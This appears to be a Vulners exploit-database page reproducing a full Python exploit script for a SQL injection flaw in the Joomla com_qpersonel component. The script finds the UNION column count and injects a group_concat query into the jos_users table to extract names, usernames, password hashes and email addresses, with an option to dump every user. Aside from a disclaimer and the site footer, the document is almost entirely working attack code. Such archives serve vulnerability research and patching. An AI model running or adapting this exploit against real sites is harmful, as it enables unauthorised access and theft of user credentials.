Vulners
Lucene search
Joomla com_qpersonel SQL Injection Remote Exploit
#!/usr/bin/python
# Joomla com_qpersonel SQL Injection Remote Exploit
# Version 1.0 (23th May 2010 (public release)
# By Valentin Hoebel ([email protected])
# ASCII FOR BREAKFAST
#
# EXPLOIT BASED ON MY COLUMN FUZZER
# Fuzzer was enhanced so it serves as a Joomla Exploiter template
#
# About the Vulnerability:
# ------------------------------------------------------------------------
# http://www.xenuser.org/documents/security/qpersonel_sql.txt
#
# About the Exploit:
# ------------------------------------------------------------------------
# Exploits the SQL injection vulnerability I discovered
# on 13th April 2010.
#
# Copy, modify, distribute and share the code as you like!
# Warning: I am not responsible for any damage you might cause!
# Exploit written for educational purposes only.
import sys, re, urllib, urllib2, string
from urllib2 import Request, urlopen, URLError, HTTPError
# Define the max. amounts for trying
max_columns = 100
# Prints usage
def print_usage():
print ""
print "================================================================================="
print " Joomla com_qpersonel SQL Injection Remote Exploit"
print " by Valentin Hoebel ([email protected])"
print ""
print " Vulnerable URL example:"
print " http://target/index.php?option=com_qpersonel&task=qpListele&katid=1"
print ""
print " Usage:"
print " -u <URL> (e.g. -u \"http://target/index.php?option=com_qpersonel&task=qpListele&katid=1\")"
print " --help (displays this text)"
print ""
print " Read the source code if you want to know more about this vulnerability."
print " For educational purposes only! I am not responsible if you cause any damage!"
print ""
print "================================================================================="
print ""
print ""
return
#Prints banner
def print_banner():
print ""
print "================================================================================="
print ""
print " Joomla com_qpersonel SQL Injection Remote Exploit"
print " by Valentin Hoebel ([email protected])"
print ""
print " For educational purposes only! I am not responsible if you cause any damage!"
print ""
print "================================================================================="
print ""
return
# Testing if URL is reachable, with error handling
def test_url():
print ">> Checking if connection can be established..."
try:
response = urllib2.urlopen(provided_url)
except HTTPError, e:
print ">> The connection could not be established."
print ">> Error code: ", e.code
print ">> Exiting now!"
print ""
sys.exit(1)
except URLError, e:
print ">> The connection could not be established."
print ">> Reason: ", e.reason
print ">> Exiting now!"
print ""
sys.exit(1)
else:
valid_target = 1
print ">> Connected to target! URL seems to be valid."
print ""
return
# Find correct amount of columns for the SQL Injection and enhance with Joomla exploitation capabilities
def find_columns():
# Define some important variables and make the script a little bit dynamic
number_of_columns = 1
column_finder_url_string = "+AND+1=2+UNION+SELECT+"
column_finder_url_message = "0x503077337220743020743368206330777321"
column_finder_url_message_plain = "P0w3r t0 t3h c0ws!"
column_finder_url_terminator = "+from+jos_users--"
next_column = ","
column_finder_url_sample = "group_concat(0x503077337220743020743368206330777321,name,username,password,email,usertype,0x503077337220743020743368206330777321)"
# Craft the final URL to check
final_check_url = provided_url+column_finder_url_string+column_finder_url_message
print ">> Trying to find the correct number of columns..."
for x in xrange(1, max_columns):
# Visit website and store response source code of site
final_check_url2 = final_check_url+column_finder_url_terminator
response = urllib2.urlopen(final_check_url2)
html = response.read()
find_our_injected_string = re.findall(column_finder_url_message_plain, html)
# When the correct amount was found we display the information and exit
if len(find_our_injected_string) != 0:
print ">> Correct number of columns found!"
print ">> Amount: ", number_of_columns
# Craft our exploit query
malicious_query = string.replace(final_check_url2, column_finder_url_message, column_finder_url_sample)
print ""
print ">> Trying to fetch the first user of the Joomla user table..."
# Receive the first user of the Joomla user table
response = urllib2.urlopen(malicious_query)
html = response.read()
get_secret_data = string.find(html, "P0w3r t0 t3h c0ws!")
get_secret_data += 18
new_html = html[get_secret_data :]
new_get_secret_data = string.find(new_html, "P0w3r t0 t3h c0ws!")
new_html_2 = new_html[:new_get_secret_data]
print "name, username, password, e-mail address and user status are shown"
print new_html_2
print ""
# Offer to display all entries of the Joomla user table
user_reply = str(raw_input(">> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) "))
if user_reply == "Y" or user_reply == "y" or user_reply == "Yes" or user_reply == "yes":
print ""
print "-------------------------------------------------------------"
print new_html
print "-------------------------------------------------------------"
print "The seperator for the single entries is: ", column_finder_url_message_plain
print "Bye!"
print ""
print ""
sys.exit(1)
else:
print "Bye!"
print ""
print ""
sys.exit(1)
# Increment counter var by one
number_of_columns += 1
#Add a new column to the URL
final_check_url += next_column
final_check_url += column_finder_url_message
# If fuzzing is not successfull print this message
print ">> Fuzzing was not successfull. Maybe the target is not vulnerable?"
print "Bye!"
print ""
print ""
# Checking if argument was provided
if len(sys.argv) <=1:
print_usage()
sys.exit(1)
for arg in sys.argv:
# Checking if help was called
if arg == "--help":
print_usage()
sys.exit(1)
# Checking if URL was provided, if yes -> go!
if arg == "-u":
provided_url = sys.argv[2]
print_banner()
# At first we test if we can actually reach the provided URL
test_url()
# Now start with finding the correct amount of columns
find_columns()
### EOF ###
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
6.7Medium risk
Vulners AI Score6.7